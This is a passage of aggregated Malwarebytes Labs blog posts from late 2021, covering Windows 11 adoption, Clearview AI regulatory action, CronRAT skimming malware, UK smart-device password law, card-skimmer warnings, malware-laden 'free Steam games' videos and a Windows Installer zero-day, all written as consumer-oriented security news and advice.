  1. Old apps: A big reason ancient operating systems like XP still run in organisations is down to old, business critical apps. For most businesses, no one size fits all solution exists. Some of the tech will be outsourced. Bits of it will operate remotely, rather than in house. There’ll be bespoke applications made by someone who left the organisation 5 years ago. Most folks won’t know how it operates, just how to patch it if something goes wrong. Pulling it out will break lots of business critical systems, and there’s no guarantee a replacement will work. Oh, and by the way: it only runs on Windows XP. That’s how you end up with XP and other old operating systems all over the place. They’ve carved their tiny niche, and almost nothing will dislodge them.
  2. Strict requirements and confusing messaging: This boils down to TPM, or Trusted Platform Module. Microsoft made this a requirement to install the newer operating system. It’s an additional security feature which helps keep bad people away from your data. Unfortunately, initial descriptions of TPM were somewhat confusing. The continued state of malaise over TPM is likely keeping folks away from Windows 11 for the time being. Even now, it’s tricky to find people who make business decisions on tech who are familiar with the issue, and have the required equipment to run Windows 11 the way it’s supposed to be run.
  3. Gaming headaches: Many home users have avoided Windows 11 because of the potential impact on gaming performance. People don’t generally want to spend thousands on gaming rigs, then find their expensive graphics card is suddenly underperforming. If they’re running mid-range or cheap cards, they’re probably even more likely to say no. There’s definitely an air of “wait and see” where this is concerned. Nobody wants to mess up their pre-loaded Windows 10 box with a failed 11 upgrade. Folks who built their machines from scratch will probably want to stay with Windows 10 for the time being too. It’s just too much of a leap in the dark at the moment.

These are the main points, but we can think of some more.

Windows 10: ageing like a fine wine

Do people actually need to suddenly jump into Windows 11? What’s the compelling reason for doing so? It seems very likely that for most people, there just isn’t one. Yet.

I often use Windows 10. I’m fine with it, after a few false starts at the beginning. The handful of alterations to core functionality and usability that I’ve heard about, aren’t things I’m particularly interested in. They’re not deal-breakers, but I just wonder “Why bother? This works fine.”

Does Microsoft want people to adopt quickly?

I think we forget that Windows 10 has already been around for 6 years. It’s not a new thing anymore! Microsoft is entirely happy to keep Windows 10 chugging along. Support for it won’t end until October 14, 2025. That’s four more years of Windows 10 action, and it’ll still be used for some time after that. By that point, some of the more peculiar quirks will have been ironed out. Businesses will have a better feel for it.

If we’re lucky, the TPM hardware issues won’t be as big a concern. Some orgs may even have figured out how to update that in-house app from XP to 11 (they will not). And hey, you can always pay for patches on End of Life operating systems, should you really want to.

It seems, on balance, that it’s better to have the rollout happen slowly. Network admins have enough security concerns to worry about. Do they really need to hurl the shiny new Windows 11 into the network and juggle that responsibility too? The numbers seem to suggest not, and it’s possible Microsoft is also happy with this approach.

Whatever your decision, we wish you well in the upgrade struggles to come.

The post Most people aren’t upgrading to Windows 11: Not the end of the world appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Massive faceprint scraping company Clearview AI hauled over the coals

Tue, 11/30/2021 - 16:43

Life must be hard for companies that try to make a living by invading people’s privacy. You almost feel sorry for them. Except I don’t.

The UK’s Information Commissioner’s Office (ICO)—an independent body set up to uphold information rights—has announced its provisional intent to impose a potential fine of just over £17 million (roughly US$23 million) on Clearview AI.

In addition, the ICO has issued a provisional notice to stop further processing of the personal data of people in the UK and delete what ClearviewAI has, following alleged serious breaches of the UK’s data protection laws.

What is Clearview AI?

Clearview AI was founded in 2017, and started to make waves when it turned out to have created a groundbreaking facial recognition app. You could take a picture of a person, upload it and get to see public photos of that person, along with links to where those photos appeared.

According to its own website, Clearview AI provides a “revolutionary intelligence platform”, powered by facial recognition technology. The platform includes a facial network of 10+ billion facial images scraped from the public internet, including news media, mugshot websites, public social media, and other open sources.

Yes, scraped from social media, which means that if you’re on Facebook, Twitter, Instagram or similar, then your face may well be in the database.

Clearview AI says it uses its faceprint database to help law enforcement fight crimes. Unfortunately it’s not just law enforcement. Journalists uncovered that Clearview AI also licensed the app to at least a handful of private companies for security purposes.

Clearview AI ran a free trial with several law enforcement agencies in the UK, but these trials have since been terminated, so there seems to be little reason for Clearview to hold on to the data.

And worried citizens that wish to have their data removed, which companies have to do upon request under the GDPR, are often required to provide the company with even more data, including photographs, to be considered for removal.

It’s not just the UK that’s worried. Earlier this month, the Office of the Australian Information Commissioner (OAIC) ordered Clearview AI to stop collecting photos taken in Australia and remove the ones already in its collection.


The ICO says that the images in Clearview AI’s database are likely to include the data of a substantial number of people from the UK and these may have been gathered without people’s knowledge from publicly available information online.

The ICO found that Clearview AI has failed to comply with UK data protection laws in several ways, including:

  • Failing to process the information of people in the UK in a way they are likely to expect or that is fair
  • Failing to have a process in place to stop the data being retained indefinitely
  • Failing to have a lawful reason for collecting the information
  • Failing to meet the higher data protection standards required for biometric data (classed as ‘special category data’ under the GDPR and UK GDPR)
  • Failing to inform people in the UK about what is happening to their data
  • And, as mentioned earlier, asking for additional personal information, including photos, which may have acted as a disincentive to individuals who wish to object to their data being processed

Clearview AI Inc now has the opportunity to make representations in respect of these alleged breaches set out in the Commissioner’s Notice of Intent and Preliminary Enforcement Notice. These representations will then be considered and a final decision will be made.

As a result, the proposed fine and preliminary enforcement notice may be subject to change or there will be no further formal action.

There is some hope for Clearview AI if you look at past fines imposed by the ICO.

Marriot was initially expected to receive a fine of 110 million Euros after a data breach that happened in 2014 but wasn’t disclosed until 2018, but Marriot ended up having to pay “only” 20 million Euros. We can expect to hear a final decision against Clearview AI by mid-2022.

Facial recognition

A facial recognition system is a technology capable of matching a human face from a digital image or a video frame against a database of faces, typically employed to identify and/or authenticate users.

Facial recognition technology has always been controversial. It makes people nervous about Big Brother. It has a tendency to deliver false matches for certain groups, like people of color. Police departments have had access to facial recognition tools for almost 20 years, but they have historically been limited to searching government-provided images, such as mugshots and driver’s license photos.

Gathering images from the public internet obviously makes for a much larger dataset, but it’s not the intention with which the images were posted.

It’s because of the privacy implications that some tech giants have backed away from the technology, or halted their development. Clearview AI clearly is not one of them. Neither a tech giant nor a company that cares about privacy.

The post Massive faceprint scraping company Clearview AI hauled over the coals appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hackers all over the world are targeting Tasmania’s emergency services

Mon, 11/29/2021 - 14:49

Emergency services—under which the police, fire, and emergency medical services departments fall—is an infrastructure vital to any country or state. But when those services come under threat from either physical or cyber entities, it’s as good as putting the lives of citizens at risk as well.

Unfortunately, not every place has the means and manpower like the US to put pressure on cybercriminals who dare target their vital infrastructures. And this is probably why some threat actors would rather take their chances targeting other countries for profit.

As a case in point, the island state of Tasmania in Australia continues to be subjected to multiple cyberattacks on its emergency services from all around the globe.

Hackers have tried breaking into Tasmania Police employee accounts over 800 times in the last 12 months, according to an internal report from the Department of Police, Fire and Management (DPFEM) that was obtained by ABC News Australia.

And that’s just the tip of the iceberg. The report also revealed:

  • CCTV cameras have been compromised
  • A section of the Tasmania Fire Service website was taken over by one or more unknown parties for at least two weeks
  • Two-factor authentication (2FA) was defeated in five occasions on devices owned by DPFEM employees

The DPFEM is said to store and maintain personally identifiable data and classified information, which makes it a goldmine for hackers. If it was ever completely compromised, DPFEM said it won’t be able to bounce back as quickly as the Federal Group, Tasmania’s casino operator that fell victim to a ransomware attack from the DarkSide hacking group, did.

“Unlike Federal Group, DPFEM will not be able to recover its entire business operation in under six weeks, even with external assistance, because its Information Security Program is not mature enough to determine the full extent of a system compromise and, therefore, will be required to take all its systems back to bare metal to ensure environmental integrity,” the report said.

The report recommended that the Tasmania Police and Fire Service should invest an $550,221 annually to “keep the department cyber safe.”

The post Hackers all over the world are targeting Tasmania’s emergency services appeared first on Malwarebytes Labs.

Categories: Techie Feeds

CronRAT targets Linux servers with e-commerce attacks

Mon, 11/29/2021 - 14:03

There’s an interesting find over at the Sansec blog, wrapping time and date manipulation up with a very smart RAT attack.

The file, named CronRAT, isn’t an e-commerce attack compromising payment terminals in physical stores. Rather, it looks to swipe payment details by going after vulnerable web stores and dropping payment skimmers on Linux servers. It’s your classic Magecart attack with a stealthy twist.

This method means it bypasses the protection people using the websites arm themselves with, rigging the game from the start. By the time you get onto the website, everything may be fine at your end but the stream further up river has already been polluted. It achieves this thanks to the Linux Cron Job system, which we’ll come back to a little later.

First of all, here’s a brief rundown on what Magecart is, and the difference between client-side and server-side attacks.

What is Magecart?

It’s the collective used for multiple groups who partake in web skimming. These attacks rely on outdated CMSes, or plugin zero days. They may go after small businesses running a particular e-commerce platform. It’s possible they use services like bulletproof hosting to frustrate researchers and law enforcement. Web shells are a popular tactic. There are even impersonators out there, just to make things even more confusing.

Client-side versus server-side attacks

Client-side is where the people who buy things from websites hang out. These are the places where operations such as Magecart may lurk. It could be bogus JavaScript loading in from untrusted domains, or perhaps some other form of rogue code. You can ward off threats such as these by using browser plugins like NoScript. There’s an element of control over these factors, in terms of how you try and secure your browser.

Server-side is an attack on the merchants. Your security processes and tools are great, but when someone is directly corrupting the site under the hood, you may be fighting a lost battle. While your typical web shopper’s first run-in with Magecart would be the previously mentioned rogue JavaScript or other code, this attack means browser-based fixes may not help.

With those out of the way, we’ll loop back to Cron and Cron Jobs.

What is Cron?

Cron is a way that people running a Linux system can schedule tasks. Those tasks will run at a specified time/date in the future, and are known as Cron Jobs. Where things get interesting is that you can enter any date you like, even ones which don’t exist. As long as the system accepts your input, it’ll take it on board and file away in the scheduling system.

CronRAT adds various tasks to the cron table, with a date specification that’ll generate run time errors when triggered. What the malware authors have done is take advantage of the “any date can be used” functionality, and assigned them to February 31st. Of course, this is a date which doesn’t actually exist. As a result, the errors will never happen.

As Sansec puts it:

…the actual malware code is hidden in the task names and is constructed using several layers of compression and base64 decoding.

The payload is a “sophisticated bash program that features self-destruction, timing modulation and a custom binary protocol to communicate with a foreign control server.”

This is definitely one way for Magecart to make waves over the Black Friday period and also further still into the Christmas season.

The problem of digital skimming

Here’s some thoughts from Jerome Segura, our Senior Director of Threat Intelligence:

We’ve known for a long time that there are two different ecosystems when it comes to website security: server-side and client-side. While most security companies focus on the latter, the former is probably the more interesting and perhaps less documented one as it requires access to backend systems. This is an example of a threat that is well crafted and meant to evade detection by default browser-side, but also in some aspects server-side due to its clever obfuscation techniques.

What that means from a digital skimming standpoint is that you are always accepting a level of risk by shopping online and placing trust in the merchant’s ability to keep their systems safe. You should be aware of any subtle changes in payment forms and other possible giveaways that a website is not up to par. Without getting too technical, certain things like outdated copyright information or broken HTML elements may be an indication that the store is not keeping their site up to date.

An attacker will first compromise online shops that are vulnerable to attacks, so it makes sense to stay clear of those that are not following best practices.

Safety first

There’s lots of things you can do out there in the real world to avoid ATM skimmers, and related threats. You can also be proactive in the realm of web-based skimmers targeting the sites you make payments on. Issues such as CronRAT may take a little while longer for various industries to figure out.

While there are varying levels of protection for web purchases, it may be dependent on payment method and/or location. It’s also not great to know that if payment data has been compromised, it’s possible the criminals have grabbed other data too. While this may not be the most reassuring message to take into the new year, forewarned is most definitely forearmed.

The post CronRAT targets Linux servers with e-commerce attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

ICO challenges adtech to step up privacy protection

Fri, 11/26/2021 - 16:25

The UK Information Commissioner’s Office (ICO) wants the advertising industry to come up with new initiatives that address the risks of adtech, and take account of data protection requirements from the outset.

The ICO is an independent body set up to uphold information rights. The technology that is currently in use by the advertising industry has the potential to be highly privacy intrusive. And the ICO has the right to issue, on initiative or on request, opinions to Parliament, government, other institutions or bodies, and the public, on any issue related to the protection of personal data.

The problem

The concept is simple: Advertisers want to show adverts to individuals who are likely to buy their product, and consumers prefer to see adverts that are relevant to them over those that are not. To accomplish this, the advertising industry has come up with a complex web of data processing which includes profiling, tracking, auctioning, and sharing of personal data.

That approach leads to advertisers knowing far more about people than they need to, and having to store and secure all that data.

Moves in the right direction

In recent years, the ad industry has developed several initiatives for less intrusive technology to address these privacy risks. These include proposals from Google and other market participants to phase out the use of third-party cookies, and other forms of cross-site tracking, and replace them with alternatives.

Federated Learning of Cohorts (FLoC) is one of the initiatives by Google that aims to thread the needle of offering people targeted ads while respecting their privacy. That initiative got off to a bad start when it became known that Google had quietly added millions of Chrome users to a FLoC pilot without asking them.

Other recent developments highlighted by the ICO include:

  • Proposals like FLoC, that aim to phase out third-party cookies and replace them with alternatives.
  • Increases in the transparency of online tracking, such as Apple’s App Tracking Transparency, which has had a notable impact—both in terms of the number of users exercising control over tracking, as well as the market itself.
  • Mechanisms to enable individuals to indicate their privacy preferences in simple and effective ways.
  • Developments by browser developers to include tracking prevention in their software.

As an example of the last point, Enhanced Tracking Protection in Firefox automatically blocks trackers that collect information about your browsing habits and interests. But this is not  as effective as you might hope. Blocking third-party cookies and related mechanisms does partially restrict cross-site trackers, but as long as a tracker is still being loaded in your browser, it can still track you. Not as easy as it was before, but tracking is still tracking, and the most prevalent cross-site trackers (looking at you,  Google and Facebook) are certainly still tracking you.


Google’s status in the digital economy means that any proposal it puts forward has a significant impact. Not just because of the market share of its browser, but also due to the services it offers individuals and organizations, and the large role it plays in the digital advertising market.

In 2019, Google announced its vision for the Google Privacy Sandbox. The building blocks for this were essentially:

  • Most aspects of the web need money to survive, and advertising that relies on cookies is the dominant revenue stream.
  • Blocking ads or cookies can prevent advertisers from generating revenue, threatening #1.
  • If you block easily controllable methods like cookies, advertisers may turn to other techniques, like fingerprinting, that are harder for users to control.

The ICO is attempting to insert itself into the rapidly evolving situation around adtech by means of a recently published opinion:

There is a window of opportunity for proposal developers to reflect on genuinely applying a data protection by design approach. The Commissioner therefore encourages Google and other participants to demonstrate how their proposals meet the expectations this opinion outlines.

The ICO is encouraging Google and other advertisers to demonstrate new proposals that can meet a set of expectations set out in the Opinion. It wants to see proposals to remove the use of technologies that lead to intrusive and unaccountable processing of personal data and device information, which increases the risks of harm to individuals.

The ICO says it expects any proposal to:

  • Engineer data protection requirements by default into the design of the initiative.
  • Offer users the choice of receiving adverts without tracking, profiling or targeting based on personal data.
  • Be transparent about how and why personal data is processed, and who is responsible for that processing.
  • Articulate the specific purposes for processing personal data
  • …and demonstrate how this is fair, lawful and transparent.
  • Address existing privacy risks and mitigate any new privacy risks that their proposal introduces.

As the ICO does, we are looking forward to more privacy focused ways of delivering targeted advertising.

The post ICO challenges adtech to step up privacy protection appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Google’s Threat Horizons report: Will the straightforward approach get results?

Thu, 11/25/2021 - 16:27

Google’s Cybersecurity Action Team has released a Threat Horizons report focusing on cloud security. It’s taken some criticism for being surprisingly straightforward and less complex than you may expect. On the other hand, many businesses simply don’t understand many of the threats at large. Perhaps this is a way of easing the people the report is aimed at into the wider discussion.

At any rate, the report is out and I think it’s worth digging into. They may be taking the “gently does it” approach because so many of their customers are falling foul to bad things. It makes sense to keep it simple in an effort to have people pay attention and nail the basics first. After all, if they can’t do that then complex rundowns stand no chance.

Key features of the report

The executive summary lists a number of key points. There’s a strong focus on issues and concerns for people using Google services. For example:

“Of 50 recently compromised GCP instances, 86% of the compromised cloud instances were used to perform cryptocurrency mining, a cloud resource-intensive, for profit activity. Additionally, 10% of compromised cloud instances were used to conduct scans of other publicly available resources on the internet to identify vulnerable systems, and 8% of instances were used to attack other targets”.

In case you’re wondering, GCP means Google Cloud Platform.

Elsewhere, the summary mentions Google cloud resources were used to generate bogus YouTube view counts. This sounds interesting, and would probably be useful to know more about it. Unfortunately there are no details in the summary, and the full report doesn’t go into the nitty-gritty of what happened either. Given this one is a clear and easily understandable way to explain how [bad thing in cloud] equals [bad knock-on effect for service everyone you know uses], it seems strange to keep us guessing.

Google also references the Fancy Bear/APT28 Gmail phishing attack, which we covered last month. While this isn’t exactly a common concern for most people, it is good to reiterate the usefulness of multiple Google security settings. 2FA, apps, backup codes, and advanced security settings are always better to have up and running than not at all.

It’s not just Google services up for discussion…

The report also briefly branches out into other realms of concern. Bogus job descriptions posing as Samsung PDFs were deliberately malformed, leading to follow up messages containing malware lurking at the links provided by the sender.

This campaign is apparently from a North Korean government-backed group, which previously targeted security researchers. There’s also a lengthy rundown of Black Matter ransomware, and (again) various tips for Google specific cloud products in terms of keeping the Black Matter threat at arm’s length.

The full report is a PDF weighing in at 28 pages long. Yes, it’s a bit light on details. However, it’s quite possible to send people running for the hills with 80+ pages of heavy-duty security information. If people are making rudimentary mistakes, why not make a gesture of highlighting said mistakes?

Simply does it

As we heard in our recent Lock and Code episode, the basics are no laughing matter. Many organisations don’t have the time, money, or resources available. They’re unable to tackle what some would consider to be incredibly obvious issues. There’s plenty of detailed security information out there already on multiple Google pages. Maybe it’s possible that this back to basics approach will pay off in the long run.

If Google’s main concern seems to mostly be “script kiddy with a cryptominer”? Then a script kiddy with a cryptominer focus we shall have. For now, we’ll just have to wait and see what kind of uptake this new approach receives and go from there.

This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.”

The post Google’s Threat Horizons report: Will the straightforward approach get results? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Improving security for mobile devices: CISA issues guides

Thu, 11/25/2021 - 16:20

The Cybersecurity and Infrastructure Security Agency (CISA) has released two actionable Capacity Enhancement Guides (CEGs) to help users and organizations improve mobile device cybersecurity.


One of the guides is intended for consumers. There are an estimated 294 million smart phone users in the US, which makes them an attractive target market for cybercriminals. Especially considering that most of us use these devices every day.

The advice listed for consumers is basic and our regular readers have probably seen most of it before. But it never hurts to repeat good advice and it may certainly help newer visitors.

  • Stay up to date. Make sure that your operating system (OS) and the apps you use are up to date, and enable automatic updating where possible.
  • Use strong authentication. Make sure to use strong passwords or pins to access your devices, and biometrics if possible and when needed. For apps, websites and services use multi-factor authentication (MFA) where possible.
  • App security:
    • Use curated app stores and stay away from apps that are offered through other channels. If they are not good enough for the curated app stores, they are probably not good for you either.
    • Delete unneeded apps. Remove apps that you no longer use, not only to free up resources, but also to diminish the attack surface.
    • Limit the amount of Personally Identifiable Information (PII) that is stored in apps.
    • Grant least privilege access to all apps. Don’t allow the apps more permissions than they absolutely need in order to do what you need them to do, and minimize their access to PII.
    • Review location settings. Only allow an app to access your location when the app is in use.
  • Network communications. Disable the network protocols that you are not using, like Bluetooth, NFC, WiFi, and GPS. And avoid public WiFi unless you can take the necessary security measures. Cybercriminals can use public WiFi networks, which are often unsecured, for attacks.
  • Protection. – Install security software on your devices. – Use only trusted chargers and cables to avoid juice jacking. A malicious charger or PC can load malware onto smartphones that may circumvent protections and take control of them. A phone infected with malware can also pose a threat to external systems such as personal computers. Enable lost device functions or a similar app. Use auto-wipe settings or apps to remove data after a certain amount of failed logins, and enable the option to remotely wipe the device.
  • Phishing protection. Stay alert, don’t click on links or open attachments before verifying their origin and legitimacy.


The guide for organizations does duplicate some of the advice given to consumers, but it has a few extra points that we would like to highlight.

  • Security focused device management. Select devices that meet enterprise requirements with a careful eye on supply chain risks.
  • Use Enterprise Mobility Management solutions (EMM) to manage your corporate-liable, employee-owned, and dedicated devices.
  • Deny access to untrusted devices. Devices are to be considered untrusted if they have not been updated to the latest platform patch level; they are not configured and constantly monitored by EMM to enterprise standards; or they are jailbroken or rooted.
  • App security. Isolate enterprise apps. Use security container technology to isolate enterprise data. Your organization’s EMM should be configured to prevent data exfiltration between enterprise apps and personal apps.
  • Ensure app vetting strategy for enterprise-developed applications.
  • Restrict OS/app synchronization. Prevent data leakage of sensitive enterprise information by restricting the backing up of enterprise data by OS/app-synchronization.
  • Disable user certificates. User certificates should be considered untrusted because malicious actors can use malware hidden in them to facilitate attacks on devices, such as intercepting communications.
  • Use secure communication apps and protocols. Many network-based attacks allow the attacker to intercept and/or modify data in transit. Configure the EMM to use VPNs between the device and the enterprise network.
  • Protect enterprise systems. Do not allow mobile devices to connect to critical systems. Infected mobile devices can introduce malware to business-critical ancillary systems such as enterprise PCs, servers, or operational technology systems. Instruct users to never connect mobile devices to critical systems via USB or wireless. Also, configure the EMM to disable these capabilities.

While you may not feel the need to apply all the advice listed above, it is good to at least know about it and consider whether it fits into the security posture that matches your infrastructure and threat model.

Stay safe, everyone!

The post Improving security for mobile devices: CISA issues guides appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New law will issue bans, fines for using default passwords on smart devices

Thu, 11/25/2021 - 14:26

The idea of connecting your entire home to the internet was once a mind-blowing concept. Thanks to smart devices, that concept is now a reality. However, this technological advancement aimed at making our lives more convenient—not to mention very cool and futuristic!—has also opened a wide door for potential cybercriminals.

New figures from a recent investigation conducted by Which?, the UK’s leading consumer awareness and review site, say that smart devices could be exposed to over 12,000 hacking and unknown scanning attacks in a single week. And smart devices are big news—a study commissioned by the UK government in 2020 revealed that almost half (49 percent) of UK residents purchased at least one smart device since the pandemic started.

And because of our high propensity to forgo changing default passwords that came with the smart devices we buy, we’re essentially putting ourselves—our homes and our family’s data and privacy—at the forefront of online attacks without us knowing.

To help address this cybersecurity and privacy problem, the UK government will soon roll out the Product Security and Telecommunications Infrastructure (PSTI) Bill that bans the use of default passwords for all internet-connected devices for the home, which we all call the Internet of Things (IoT). This law covers smartphones, routers, games consoles, toys, speakers, security cameras, internet-enabled white goods (fridge, washing machine, etc.) but not vehicles, smart meters, smart medical devices, laptops, and desktop computers. Firms that don’t comply will face huge fines.

The BBC has highlighted three new rules under this bill:

  • Easy-to-guess default passwords preloaded on devices are banned. All products now need unique passwords that cannot be reset to factory default
  • Customers must be told when they buy a device the minimum time it will receive vital security updates and patches. If a product doesn’t get either, that must also be disclosed
  • Security researchers will be given a public point of contact to point out flaws and bugs

A regulator will be appointed to oversee this bill once fully enforced. They will also have the power to fine manufacturers of vulnerable smart devices and the markets that sell them (Amazon, for example) up to £10M GBP or 4% of their global earnings. They can also impose an additional fine of £20,000 a day if the company continues to be in violation with the law.

“This is just the first step”

Julia Lopez, the Minister of State at the Department for Digital, Culture, Media and Sport, said: “Our bill will put a firewall around everyday tech from phones and thermostats to dishwashers, baby monitors and doorbells, and see huge fines for those that fall foul of tough new security standards.”

While Ken Munro, a security consultant for Pen Test Partners, told the BBC he sees the bill as a “big step in the right direction”, he also cautions about complacency, “However, it’s important that government acknowledges that this is just the first step. These laws will need continual improvement to address more complex security issues in smart devices,” he said.

The post New law will issue bans, fines for using default passwords on smart devices appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Beware card skimmers this Black Friday

Thu, 11/25/2021 - 10:23

The UK’s top cybercops are urging owners of small online shops to “protect their customers and profits” by guarding against card skimmers in the frenetic shopping period that starts with Black Friday, which lands on November 26 this year.

The warning comes from the National Cyber Security Centre (NCSC)—which is part of GCHQ, the UK’s equivalent to the NSA—which says it identified 4,151 compromised online shops up to the end of September.

Card skimmers, also know as web skimmers, are bits of malicious software that are injected into legitimate websites, so they can steal shoppers’ credit card details. The skimmers read the details as users type them into the sites’ payment forms, or replace the payment forms with convincing fakes.

The longer that cybercriminals can keep their card skimmers on a website before its customers or owners notice, the more money they will make, so they take care to be as unobtrusive as possible. Unsurprisingly, Malwarebytes’ own research has shown that card skimming activity tends to ramp up on the busiest shopping days, when the most money changes hands. And some of the biggest shopping days of the year are nearly upon us, starting with Black Friday, the biggest of them all.

For the uninitiated, Black Friday is the annual celebration of peak capitalism that commemorates the symbolic moment that retailers go “in to the black” for the year and start to make a profit. If you’re wondering why shoppers would be so keen to celebrate the mechanics of retail accountancy, it’s because shops mark the occasion (the Friday that follows Thanksgiving in the US) with extravagant sales, offers, and deals.

The NCSC is rightly concerned that with record amounts of money expected to slosh about on the Internet in the next few days, cybercriminals will be hard at work, spoiling everyone’s fun.

Yes, you

It is worth noting that the NCSC’s announcement uses the word “small” no less than four times— “small online shops”; “small business sites”; “small online retailers”; “small and medium-sized online retailers”—in a short announcement that also mentions “SMEs” twice, and says it is written for “small & medium sized organisations”.

On the off-chance the point still hasn’t landed, let me spell it out for you: The NCSC would like you to know that no online business is small enough to ignore the threat of card skimmers.

I will add a personal note to that too. If you assume you are too small to be attacked by a card skimmer and your customers later find out their card details were stolen while on your site, they will expect you to have cared a great deal more. At least that’s how I felt when it happened to me.

Not just Magento

Although its guidance is aimed at all e-commerce retailers, the NCSC makes specific mention of sites built on the Magento platform, which it says has been particularly popular with cybercriminals lately:

The majority of the online shops used for skimming identified by the NCSC had been compromised via a known vulnerability in Magento, a popular e-commerce platform.

However, your takeaway after reading that should not be “Magento” so much as “known vulnerability”. Cybercriminals do not care that you’re running Magento, they only care that you are running a system they can exploit because it contains a known vulnerability, and any system with a known vulnerability will do, thanks. It so happens that Magento has been a prime target recently, but every decent e-commerce system has known vulnerabilities. Not using Magento is no protection whatsoever.

What really matters is whether or not ecommerce sites are patched promptly when fixes for vulnerabilities are made available. Which is why the NCSC’s headline guidance is “Retailers are urged to ensure that Magento—and any other software they use—is up to date”.

Keeping website software up to date will certainly take you a very long way indeed in terms of protecting against card skimmers, but there is more to it than that.

For the “more to it than that”, the NCSC point readers to the British Retail Consortium’s Cyber Resilience Toolkit for Retail, and its own website, which is full of useful cybersecurity advice, although neither resource is specifically about card skimming.

I would like to humbly suggest that readers should also consult our own guidance on how to defend your website against card skimmers. Our easy-to-digest advice is aimed at preventing card skimming specifically and explains how card skimming gangs find victims; why everyone is a potential target; how to avoid a website breach; how to protect your customers from a card skimmer if you are breached; and how to detect card skimmers as quickly as possible.

The post Beware card skimmers this Black Friday appeared first on Malwarebytes Labs.

Categories: Techie Feeds

“Free Steam games” videos promise much, deliver malware

Wed, 11/24/2021 - 16:46

Gamers are a hot target for scammers, especially in the run up to Christmas. Major games are released throughout the last few months of any year, and the FOMO (fear of missing out) is strong. Especially if said titles offer pre-order exclusive bonuses, or deals and discounts for a few weeks after the game launches.

There’s a lot of big titles hitting digital storefronts at the moment. In the last few weeks alone we’ve seen the release of:

  • Skyrim Anniversary Edition
  • Forza Horizon 5
  • Jurassic World Evolution 2
  • Halo Infinite (portions of it, with more to come)
  • Myth of Empires
  • Battlefield 2042

Add other upcoming titles and older ones updated for the festive season into the mix, and it’s fertile ground for people up to no good.

Bogus YouTube videos promise much, deliver little

We’ve seen a lot of activity on YouTube in the last 24 hours in relation to dubious videos. They ride on the coat tails of common searches for “free” versions of popular titles like Skyrim, CSGO, PUBG, Cyberpunk, and more. Other videos focus on Call of Duty, GTAV, Fallout 4, and DayZ.

In all cases, “free Steam keys” are the name of the fake out game. No matter which of the many accounts post up these videos, they all typically link to the same download hosting site.

When free games lead to Malware

The file offered up for download is SteamKeyGeneration.rar, weighing in at 4.19MB. YouTube pages containing the link offer the following instructions:

“Download the ExLoader, open the RAR file, open the EXE file”

The .RAR is password protected, with the password being supplied in the YouTube description. Once the executable runs on the target system, it’s infected by the owner’s own hand.

We detect the file as Trojan.Malpack. This is a generic name given to files which have been packed suspiciously. The actual payload can be anything at all, but this form of packing files is not typically used for legitimate purposes. We’ve seen similar attacks like this previously. In 2018, Fortnite gamers were targeted by scammers pushing Trojan.Malpack files as Fortnite freebies. If the files were downloaded and run on the target system, the reward for doing so was data theft.

Part of a bigger campaign, or a standalone?

YouTube has definitely had some trouble along these lines recently. Researchers at Cluster25 spotted similar activity, targeting a multitude of interests including how-to guides, cryptocurrency, VPN software, and more. In those cases, activity seems to be primarily geared towards two infection paths.

Videos with bit(dot)ly links send victims to download sites such as Mega. Unshortened links redirect to taplink(dot)cc to push Racoon Stealer. Target machines are scanned for card details, passwords, cryptocurrency wallets and other forms of data. This is all harvested and sent on to the attacker.

There are similarities, despite the final destination links being different to those mentioned – such as the password requirement, the similarities in scam setup. Of course, this isn’t a particularly new or novel tactic for YouTube attacks. Including a link to an off-site compressed file on free file hosting, and disabling comments so nobody can point out they’ve had things stolen is video portal shenanigans 101.

You also tend to see one major campaign hit and enjoy success, and then lots of smaller would-be scammers jump on the bandwagon and before long everybody is doing it.

Tips to avoid scams

Whether this is part of the same campaign, a spin-off, or is simply inspired by it, you should avoid any promise of free games deploying these techniques on YouTube. The warning signs are:

  1. Too good to be true claims of Steam (or another platform) being “hacked”, with free games being the end result.
  2. Brand new accounts with no other content than these videos. Much older accounts which have been dormant until now, or display a sudden shift in content produced. Were they making videos of their cats until last week and now they’re all about hacked Skyrim downloads? Beware.
  3. Comments disabled. Anybody linking to off-site files and turning off the comments may not have your best interests at heart.

Getting your hands on a cool new game at a discount is always good news, but sometimes the hidden cost is just too high.

The post “Free Steam games” videos promise much, deliver malware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Windows Installer vulnerability becomes actively exploited zero-day

Wed, 11/24/2021 - 14:21

Sometimes the ways in which malicious code gets in the hands of cybercriminals is frustrating for those in the industry, and incomprehensible to those on the outside.

A quick summary of the events in the history of this exploit:

  • A researcher found a flaw in Windows Installer that would allow an attacker to delete targeted files on an affected system with elevated privileges.
  • Microsoft patched the vulnerability in November’s Patch Tuesday update.
  • The researcher found a way to circumvent the patch and this time decided not to engage in responsible disclosure because he got frustrated with Microsoft’s bug bounty program.
  • The researcher’s PoC is being tested in the wild and cybercriminals could be preparing the first real attacks exploiting this vulnerability.

Let’s have a look at what is going on and how it came to this.

The vulnerability

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

The vulnerability in question was listed as CVE-2021-41379 and is a local Windows Installer Elevation of Privilege (EoP) vulnerability. If successfully exploited, the bypass could give attackers SYSTEM privileges on up-to-date devices running the latest Windows releases, including Windows 10, Windows 11, and Windows Server 2022.

By exploiting this zero-day, threat actors that already have limited access to compromised systems can elevate their privileges and use these privileges to spread laterally within a target network.

The patch

Microsoft patched the vulnerability in the November Patch Tuesday updates. But according to the researcher, the bug was not fixed correctly. He discovered a new variant during the analysis of the CVE-2021-41379 patch.

With the new variant, an attacker will be able to run programs with a higher privilege than they are entitled to. To be clear, an attacker using the new variant must already have access and the ability to run code on a target victim’s machine, but now they can run the code with SYSTEM privileges thanks to the exploit.

The frustration

